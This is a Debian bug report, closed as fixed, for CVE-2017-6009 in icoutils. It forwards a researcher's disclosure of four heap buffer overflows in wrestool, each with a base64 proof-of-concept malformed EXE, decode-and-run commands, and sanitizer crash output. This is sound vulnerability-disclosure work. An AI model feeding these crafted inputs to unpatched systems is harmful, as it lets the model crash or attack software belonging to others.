Bug#854050: marked as done (icoutils: CVE-2017-6009)

Debian Bug Tracking System Tue, 07 Mar 2017 14:37:20 -0800

Your message dated Tue, 07 Mar 2017 22:34:21 +0000
with message-id <e1clngt-0006di...@fasolo.debian.org>
and subject line Bug#854050: fixed in icoutils 0.31.2-1
has caused the Debian Bug report #854050,
regarding icoutils: CVE-2017-6009
to be marked as done.


This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
854050: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=854050
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

--- Begin Message ---

Package: icoutils
Version: 0.31.1
Tags: security upstream

---------- Forwarded message ----------
From: op7ic \x00 <op7...@gmail.com>
Date: Fri, Feb 3, 2017 at 1:13 PM
Subject: Buffer Overflows in wrestool (part of icoutils-0.31.1 package).
To: Frank Richter <frank.rich...@gmail.com>, Oskar Liljeblad
<os...@osk.mine.nu>, sub...@bugs.debian.org

Hi guys,

I wanted to report a few more crashes in wrestool. They are mostly
related to boundary checks on operations such as memcpy etc.

Please see attached reports.

Cheers,
op7ic

Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.1
Release Status: release
Author: Jerzy Kramarz


Description:

A heap-based buffer overflow was observed in "calc_vma_size" function in 
"restable.c" source file. This issue can be triggered by processing a corrupted 
exe file and will result in wrestool crash. 


To replicate this issue use the attached sample below and execute the following 
command:

/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe

PoC file (base64 encoded):

TVoAAFBFAABM/v8AdXNlcjMyAAAAUEX/AHVzZXIzMgAAAFBFAADp//8kAAIACwFrZQIAAAAAUEUA
AABQRQAAAAAA/38AUEUAAAAAAFBFAAAAAgAAAAQAAAA=


Repeat-By:
echo <above base64> > PoC.exe.b64
base64 -d PoC.exe.b64 > PoC.exe
/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe


Valgrind Output: 

valgrind /home/ico-target/icoutils-0.31.1/wrestool/wrestool -l /tmp/PoC.exe

==23339== Memcheck, a memory error detector
==23339== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==23339== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==23339== Command: /home/ico-target/icoutils-clean/wrestool/wrestool -l 
/home/ico-target/icoutils-0.31.1/wretool-output/crashes/PoC.exe
==23339==
==23339== Invalid read of size 2
==23339==    at 0x4034D0: calc_vma_size (restable.c:490)
==23339==    by 0x4034D0: read_library (restable.c:421)
==23339==    by 0x401827: main (main.c:322)
==23339==  Address 0x51e19f9 is 0 bytes after a block of size 89 alloc'd
==23339==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==23339==    by 0x406408: xmalloc (xmalloc.c:41)
==23339==    by 0x4017F9: main (main.c:315)
==23339==
/home/ico-target/icoutils-clean/wrestool/wrestool: 
/home/ico-target/icoutils-0.31.1/wretool-output/crashes/PoC.exe: premature end
==23339== Argument 'size' of function realloc has a fishy (possibly negative) 
value: -1
==23339==    at 0x4C2AF2E: realloc (vg_replace_malloc.c:692)
==23339==    by 0x406465: xrealloc (xmalloc.c:61)
==23339==    by 0x4033DA: read_library (restable.c:426)
==23339==    by 0x401827: main (main.c:322)
==23339==
/home/ico-target/icoutils-clean/wrestool/wrestool: memory exhausted
==23339==
==23339== HEAP SUMMARY:
==23339==     in use at exit: 657 bytes in 2 blocks
==23339==   total heap usage: 45 allocs, 43 frees, 10,019 bytes allocated
==23339==
==23339== LEAK SUMMARY:
==23339==    definitely lost: 0 bytes in 0 blocks
==23339==    indirectly lost: 0 bytes in 0 blocks
==23339==      possibly lost: 0 bytes in 0 blocks
==23339==    still reachable: 657 bytes in 2 blocks
==23339==         suppressed: 0 bytes in 0 blocks
==23339== Rerun with --leak-check=full to see details of leaked memory
==23339==
==23339== For counts of detected and suppressed errors, rerun with: -v
==23339== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)


ASAN Report (needs to compiled with -fsanitize=address):

==10056==ERROR: AddressSanitizer: heap-buffer-overflow on address 
0x60800000bf79 at pc 0x4129fe bp 0x73424dec2ae0 sp 0x73424dec2ad8
READ of size 2 at 0x60800000bf79 thread T0
    #0 0x4129fd in calc_vma_size 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:490
    #1 0x4129fd in read_library 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:421
    #2 0x403109 in main /home/ico-target/icoutils-0.31.1/wrestool/main.c:322
    #3 0x64abe35deb44 in __libc_start_main 
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #4 0x403f35 (/home/ico-target/icoutils-0.31.1/wrestool/wrestool+0x403f35)

0x60800000bf79 is located 0 bytes to the right of 89-byte region 
[0x60800000bf20,0x60800000bf79)
allocated by thread T0 here:
    #0 0x64abe39bc73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x42e290 in xmalloc /home/ico-target/icoutils-0.31.1/lib/xmalloc.c:41

SUMMARY: AddressSanitizer: heap-buffer-overflow 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:490 calc_vma_size
Shadow bytes around the buggy address:
  0x0c107fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff97a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff97b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff97c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff97d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c107fff97e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00[01]
  0x0c107fff97f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c107fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff9810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff9820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c107fff9830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==10056==ABORTING

Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.1
Release Status: release
Author: Jerzy Kramarz


Description:

A buffer overflow was observed in "decode_ne_resource_id" function in 
"restable.c" source file. This is happening because "len" parameter for memcpy 
operation is not checked for size and thus becomes negative integer in the 
process, resulting in failed memcpy operation. This issue can be triggered by 
processing a corrupted exe file and will result in wrestool crash. 


To replicate this issue use the attached sample below and execute the following 
command:

/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe

PoC file (base64 encoded):

TkUAIAABAAh1c2VySQAAAAAAAAAAAAQAAAAAAAIACwFr//9/AQAAgAAAABAAAAAAAAAAIAAAAAAA
AAIAAAAAAA==


Repeat-By:
echo <above base64> > PoC.exe.b64
base64 -d PoC.exe.b64 > PoC.exe
/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe


Valgrind Output: 

==13487== Memcheck, a memory error detector
==13487== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==13487== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==13487== Command: /home/ico-target/icoutils-clean/wrestool/wrestool -l PoC.exe
==13487==
==13487== Invalid write of size 8
==13487==    at 0x402629: decode_ne_resource_id (restable.c:235)
==13487==    by 0x40287A: list_ne_type_resources (restable.c:338)
==13487==    by 0x40287A: list_resources (restable.c:365)
==13487==    by 0x402C28: do_resources_recurs (restable.c:80)
==13487==    by 0x402F2E: do_resources (restable.c:60)
==13487==    by 0x40189F: main (main.c:339)
==13487==  Address 0x51e1da7 is 9 bytes before a block of size 280 alloc'd
==13487==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==13487==    by 0x406408: xmalloc (xmalloc.c:41)
==13487==    by 0x4027F4: list_ne_type_resources (restable.c:327)
==13487==    by 0x4027F4: list_resources (restable.c:365)
==13487==    by 0x402C28: do_resources_recurs (restable.c:80)
==13487==    by 0x402F2E: do_resources (restable.c:60)
==13487==    by 0x40189F: main (main.c:339)
==13487==
==13487== Invalid read of size 8
==13487==    at 0x40262E: decode_ne_resource_id (restable.c:235)
==13487==    by 0x40287A: list_ne_type_resources (restable.c:338)
==13487==    by 0x40287A: list_resources (restable.c:365)
==13487==    by 0x402C28: do_resources_recurs (restable.c:80)
==13487==    by 0x402F2E: do_resources (restable.c:60)
==13487==    by 0x40189F: main (main.c:339)
==13487==  Address 0x51e19da is 58 bytes inside a block of size 64 alloc'd
==13487==    at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==13487==    by 0x406408: xmalloc (xmalloc.c:41)
==13487==    by 0x4017F9: main (main.c:315)
==13487==
==13487==
==13487== Process terminating with default action of signal 11 (SIGSEGV)
==13487==  Bad permissions for mapped region at address 0x55E0000
==13487==    at 0x40262E: decode_ne_resource_id (restable.c:235)
==13487==    by 0x40287A: list_ne_type_resources (restable.c:338)
==13487==    by 0x40287A: list_resources (restable.c:365)
==13487==    by 0x402C28: do_resources_recurs (restable.c:80)
==13487==    by 0x402F2E: do_resources (restable.c:60)
==13487==    by 0x40189F: main (main.c:339)
==13487==
==13487== HEAP SUMMARY:
==13487==     in use at exit: 1,752 bytes in 4 blocks
==13487==   total heap usage: 35 allocs, 31 frees, 5,455 bytes allocated
==13487==
==13487== LEAK SUMMARY:
==13487==    definitely lost: 0 bytes in 0 blocks
==13487==    indirectly lost: 0 bytes in 0 blocks
==13487==      possibly lost: 0 bytes in 0 blocks
==13487==    still reachable: 1,752 bytes in 4 blocks
==13487==         suppressed: 0 bytes in 0 blocks
==13487== Rerun with --leak-check=full to see details of leaked memory
==13487==
==13487== For counts of detected and suppressed errors, rerun with: -v
==13487== ERROR SUMMARY: 1046502 errors from 2 contexts (suppressed: 0 from 0)
Segmentation fault


ASAN Report (needs to compiled with -fsanitize=address):

==1056==ERROR: AddressSanitizer: unknown-crash on address 0x61200000bec0 at pc 
0x40c433 bp 0x72ccfb544270 sp 0x72ccfb544268
WRITE of size 18446744073709551615 at 0x61200000bec0 thread T0
    #0 0x40c432 in decode_ne_resource_id 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:235
    #1 0x40c432 in list_ne_type_resources 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:338
    #2 0x40c432 in list_resources 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:365
    #3 0x40d550 in do_resources_recurs 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:80
    #4 0x40e758 in do_resources 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:60
    #5 0x403182 in main /home/ico-target/icoutils-0.31.1/wrestool/main.c:339
    #6 0x6e7fedb36b44 in __libc_start_main 
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #7 0x403f35 (/home/ico-target/icoutils-0.31.1/wrestool/wrestool+0x403f35)

0x61200000bec0 is located 0 bytes inside of 280-byte region 
[0x61200000bec0,0x61200000bfd8)
allocated by thread T0 here:
    #0 0x6e7fedf1473f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x42e290 in xmalloc /home/ico-target/icoutils-0.31.1/lib/xmalloc.c:41

SUMMARY: AddressSanitizer: unknown-crash 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:235 decode_ne_resource_id
Shadow bytes around the buggy address:
  0x0c247fff9780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff97a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff97b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff97c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c247fff97d0: fa fa fa fa fa fa fa fa[00]00 00 00 00 00 00 00
  0x0c247fff97e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fff97f0: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c247fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff9810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff9820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==1056==ABORTING

Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.1
Release Status: release
Author: Jerzy Kramarz


Description:

A heap-based buffer overflow was observed in "do_resources_recurs" function in 
"restable.c" source file. This issue can be triggered by processing a corrupted 
exe file and will result in wrestool crash. 


To replicate this issue use the attached sample below and execute the following 
command:

/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe

PoC file (base64 encoded):

TkUAAEwBAAh1c2VySQAAAAAAAAAAAAQAAAAAAAIACwFr//8AAAABAAAAABAAAAAAAAAAIAAAAAAA
AAIAAAAAAA==


Repeat-By:
echo <above base64> > PoC.exe.b64
base64 -d PoC.exe.b64 > PoC.exe
/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe


Valgrind Output: 

valgrind /home/ico-target/icoutils-0.31.1/wrestool/wrestool -l /tmp/PoC.exe
==16526== Memcheck, a memory error detector
==16526== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==16526== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==16526== Command: /home/ico-target/icoutils-0.31.1/wrestool/wrestool -l 
/tmp/PoC.exe
==16526==
==16526== Invalid read of size 4
==16526==    at 0x402D4C: do_resources_recurs (restable.c:100)
==16526==    by 0x402F2E: do_resources (restable.c:60)
==16526==    by 0x40189F: main (main.c:339)
==16526==  Address 0x51e1ec0 is 208 bytes inside an unallocated block of size 
4,186,608 in arena "client"
==16526==
==16526==
==16526== HEAP SUMMARY:
==16526==     in use at exit: 0 bytes in 1 blocks
==16526==   total heap usage: 35 allocs, 34 frees, 5,175 bytes allocated
==16526==
==16526== LEAK SUMMARY:
==16526==    definitely lost: 0 bytes in 1 blocks
==16526==    indirectly lost: 0 bytes in 0 blocks
==16526==      possibly lost: 0 bytes in 0 blocks
==16526==    still reachable: 0 bytes in 0 blocks
==16526==         suppressed: 0 bytes in 0 blocks
==16526== Rerun with --leak-check=full to see details of leaked memory
==16526==
==16526== For counts of detected and suppressed errors, rerun with: -v
==16526== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)



ASAN Report (needs to compiled with -fsanitize=address):


=================================================================
==1753==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ef00 
at pc 0x40e630 bp 0x772c846e54d0 sp 0x772c846e54c8
READ of size 4 at 0x60200000ef00 thread T0
    #0 0x40e62f in do_resources_recurs 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:100
    #1 0x40e758 in do_resources 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:60
    #2 0x403182 in main /home/ico-target/icoutils-0.31.1/wrestool/main.c:339
    #3 0x6a3f991c9b44 in __libc_start_main 
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #4 0x403f35 (/home/ico-target/icoutils-0.31.1/wrestool/wrestool+0x403f35)

0x60200000ef00 is located 4 bytes to the right of 12-byte region 
[0x60200000eef0,0x60200000eefc)
allocated by thread T0 here:
    #0 0x6a3f995a773f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x6a3f99229989 in strdup (/lib/x86_64-linux-gnu/libc.so.6+0x81989)

SUMMARY: AddressSanitizer: heap-buffer-overflow 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:100 do_resources_recurs
Shadow bytes around the buggy address:
  0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 01 fa
  0x0c047fff9dc0: fa fa 00 01 fa fa 00 04 fa fa 00 04 fa fa 00 04
  0x0c047fff9dd0: fa fa 00 04 fa fa 00 04 fa fa 00 04 fa fa 00 04
=>0x0c047fff9de0:[fa]fa 00 04 fa fa 00 04 fa fa 00 04 fa fa 00 04
  0x0c047fff9df0: fa fa 00 04 fa fa 00 04 fa fa 00 04 fa fa fd fa
  0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==1753==ABORTING

Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.1
Release Status: release
Author: Jerzy Kramarz


Description:

A heap-based buffer overflow was observed in "read_library" function in 
"restable.c" source file. This issue can be triggered by processing a corrupted 
exe file and will result in wrestool crash. 

Note: similar crashes appear on line 429, 445 in the same function. They got 
pretty much the same root cause.


To replicate this issue use the attached sample below and execute the following 
command:

/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe

PoC file (base64 encoded):

S18AAFBFAABMAQAAZQAAAAAAEAAAAAAAAID/AADp/x3/fw==

Repeat-By:
echo <above base64> > PoC.exe.b64
base64 -d PoC.exe.b64 > PoC.exe
/home/ico-target/icoutils-0.31.1/wrestool/wrestool -l PoC.exe


Valgrind Output: 

valgrind /home/ico-target/icoutils-0.31.1/wrestool/wrestool -l /tmp/PoC.exe

==17351== Memcheck, a memory error detector
==17351== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==17351== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==17351== Command: /fuzz/ico-target/icoutils-clean/wrestool/wrestool -l PoC.exe
==17351==
==17351== Invalid read of size 4
==17351==    at 0x40324B: read_library (restable.c:392)
==17351==    by 0x401827: main (main.c:322)
==17351==  Address 0x51e19dc is 12 bytes after a block of size 48 in arena 
"client"
==17351==
==17351== Invalid read of size 4
==17351==    at 0x40326D: read_library (restable.c:393)
==17351==    by 0x401827: main (main.c:322)
==17351==  Address 0x51e19dc is 12 bytes after a block of size 48 in arena 
"client"
==17351==
==17351== Invalid read of size 4
==17351==    at 0x40329B: read_library (restable.c:414)
==17351==    by 0x401827: main (main.c:322)
==17351==  Address 0x51e19dc is 12 bytes after a block of size 48 in arena 
"client"
==17351==
/home/ico-target/icoutils-clean/wrestool/wrestool: PoC.exe: not a PE or NE 
library
==17351==
==17351== HEAP SUMMARY:
==17351==     in use at exit: 0 bytes in 0 blocks
==17351==   total heap usage: 43 allocs, 43 frees, 9,859 bytes allocated
==17351==
==17351== All heap blocks were freed -- no leaks are possible
==17351==
==17351== For counts of detected and suppressed errors, rerun with: -v
==17351== ERROR SUMMARY: 3 errors from 3 contexts (suppressed: 0 from 0)



ASAN Report (needs to compiled with -fsanitize=address):

==28110==ERROR: AddressSanitizer: heap-buffer-overflow on address 
0x60400000dfcc at pc 0x412c03 bp 0x7515a6f88940 sp 0x7515a6f88938
READ of size 4 at 0x60400000dfcc thread T0
    #0 0x412c02 in read_library 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:392
    #1 0x403109 in main /home/ico-target/icoutils-0.31.1/wrestool/main.c:322
    #2 0x6fdd0327fb44 in __libc_start_main 
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #3 0x403f35 (/home/ico-target/icoutils-0.31.1/wrestool/wrestool+0x403f35)

0x60400000dfcc is located 4 bytes to the left of 33-byte region 
[0x60400000dfd0,0x60400000dff1)
allocated by thread T0 here:
    #0 0x6fdd0365d73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x6fdd0328c9b0 (/lib/x86_64-linux-gnu/libc.so.6+0x2e9b0)

SUMMARY: AddressSanitizer: heap-buffer-overflow 
/home/ico-target/icoutils-0.31.1/wrestool/restable.c:392 read_library
Shadow bytes around the buggy address:
  0x0c087fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff9be0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c087fff9bf0: fa fa 00 00 00 00 02 fa fa[fa]00 00 00 00 01 fa
  0x0c087fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==28110==ABORTING

--- End Message ---

--- Begin Message ---

Source: icoutils
Source-Version: 0.31.2-1

We believe that the bug you reported is fixed in the latest version of
icoutils, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 854...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Colin Watson <cjwat...@debian.org> (supplier of updated icoutils package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Tue, 07 Mar 2017 22:18:53 +0000
Source: icoutils
Binary: icoutils
Architecture: source
Version: 0.31.2-1
Distribution: unstable
Urgency: high
Maintainer: Colin Watson <cjwat...@debian.org>
Changed-By: Colin Watson <cjwat...@debian.org>
Description:
 icoutils   - Create and extract MS Windows icons and cursors
Closes: 854050 854054
Changes:
 icoutils (0.31.2-1) unstable; urgency=high
 .
   * New upstream release.
     - CVE-2017-6009, CVE-2017-6010, CVE-2017-6011: Various security fixes
       from Martin Gieseking, issues found by Jerzy Kramarz (closes: #854050,
       #854054).
Checksums-Sha1:
 e0f88ce4c7d1ca5ab5885e052f397e249657cc81 1952 icoutils_0.31.2-1.dsc
 49391e2187ea9850893e042b69444e6b4cc5f9aa 573585 icoutils_0.31.2.orig.tar.bz2
 7b24e823b3cdbd6696ea3dd4a2fab01d2fa9aa09 4820 icoutils_0.31.2-1.debian.tar.xz
 7d96f57070eea28e970a27f74acd2714ed445269 4990 
icoutils_0.31.2-1_source.buildinfo
Checksums-Sha256:
 4d88ff0e735f860393c949b4087edd247e7e1eabd16702869f48baf7fdacde76 1952 
icoutils_0.31.2-1.dsc
 14155eb22e7531ed449a822a3e94df511a36b75273fcece75a37794ed3e34be0 573585 
icoutils_0.31.2.orig.tar.bz2
 c2030c0e4a69d761a2230c2fea47983963b3207a440630f75ecfa1e0cef37980 4820 
icoutils_0.31.2-1.debian.tar.xz
 23abc7be485f9a9c474fe4ae467f028b886a73b6b0d05f5fa1ffb19ce47eb63b 4990 
icoutils_0.31.2-1_source.buildinfo
Files:
 f08e6dfe37106912540d187f606aab6c 1952 graphics optional icoutils_0.31.2-1.dsc
 adf40f06b43c64b9ffcf2ead6ef3db17 573585 graphics optional 
icoutils_0.31.2.orig.tar.bz2
 4c0c730762a42c003ecef9477358642d 4820 graphics optional 
icoutils_0.31.2-1.debian.tar.xz
 ec493418e958a400e212a3e5477b6528 4990 graphics optional 
icoutils_0.31.2-1_source.buildinfo

-----BEGIN PGP SIGNATURE-----
Comment: Colin Watson <cjwat...@debian.org> -- Debian developer

iQIzBAEBCAAdFiEErApP8SYRtvzPAcEROTWH2X2GUAsFAli/Mg8ACgkQOTWH2X2G
UAva0Q/8D82uHV2gG3Gs7xe3L1zhY74DHoXNdDaIJjzKMeYGEWz/S2ruwLkvnKHC
USH/Zl9RnMSd6ZdKXepUWg5tV4yblVBwisnWjVWmQAQVBpWTYSh+lRgdcuZXrSww
Rca9HAa+q/PXGaYzZ8TXvuYUGR+WqV8JbmWXcPb7ix3ud/wjd0EsnGXDC201vx7e
ZZ+OZIxOBWWjtD47llVzUvDFNL+0Wjn3wmCtxVvQ921ACEq0eOE83JxgZjBjivB/
pOVSJo6bS/Nl99Svn2dG301qlhAMrem3GYMgdst1vsgYsfr4lWNNnJSogLszO/F8
sYXoOsNGQGOw+5QQfDGWIFoM/u7DMoO0T+fzCabMhuHQE8+pfpcG0SptmvdFdywI
t/QoPvC06HMBRypUcH+kG4aNMfwoX68CG0AIDLRQDhIN40AXM72w7XuxCC4RT3uu
oa433ecoL1yynHj3n+4NGWPwIlEmfNodKQ/bWrUwC5dfUmrm4cQGCDAU36KRueqF
T4jOixkQjJlxd98kZLUPFO1MjFQjfW3L9L4+IWU5U/llCZ35P/U2e6D1fCnIUBTR
d3EXw16lim0tFbBfdrskkcAfNtiUxUw3KvGbCfEqOBWzuT1/IFIK4jQhC5NzDohP
THw7PiP6Sxb5NfcVO+4wMcvqXvOFwz8Ek0/AzQhVFDvnJyd5DaA=
=9Ds8
-----END PGP SIGNATURE-----

--- End Message ---

Bug#854050: marked as done (icoutils: CVE-2017-6009)

Reply via email to